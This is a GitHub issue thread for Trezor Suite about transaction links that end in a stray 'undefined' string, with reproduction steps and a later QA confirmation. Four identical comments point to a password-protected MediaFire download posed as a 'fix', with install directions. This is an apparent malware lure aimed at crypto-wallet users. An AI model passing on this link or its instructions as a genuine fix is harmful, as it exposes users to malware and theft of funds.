### ISSUE TITLE
Transaction link contains unexpected `undefined` string.

### ISSUE THREAD

**Issue by bosomt** [trezor/trezor-suite#14000]
**Describe the bug**
Transaction link contains unexpected `undefined` string.

https://btc2.trezor.io/tx/b6eb9e296ab44f9a8bcd2b1869d641ee116ffad60a39a83114cb04d4313ab2a9undefined
https://eth2.trezor.io/tx/0xf43456f820df02dbbbde170240e363a1323e2a55e09a4f7b7df37c6eb987e55bundefined

**Steps to reproduce:**
1. Open wallet with transaction history
2. Open Blockbook transaction link from transaction history
3. Observe error

**Info:**
 - Suite version: web 24.9.0 (3338cba900bff2c78ce368d62c9ada080ee2c08e)
 - Browser: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:129.0) Gecko/20100101 Firefox/129.0
 - OS: MacIntel
 - Screen: 1512x982
 - Device: Trezor T3T1 2.8.0 regular (revision dd4671a5104952ef505d28d1f9e94d1484b4607a)
 - Transport: BridgeTransport 2.0.32

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bosomt** [comment]
**QA OK**

**Info:**
 - Suite version: web 24.10.0 (ad118a04f39d2b359e76282c18b8ef92c011d7e5)
 - Browser: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:129.0) Gecko/20100101 Firefox/129.0
 - OS: MacIntel
 - Screen: 1512x982
 - Device: Trezor T3T1 2.8.0 regular (revision dd4671a5104952ef505d28d1f9e94d1484b4607a)
 - Transport: BridgeTransport 2.0.33
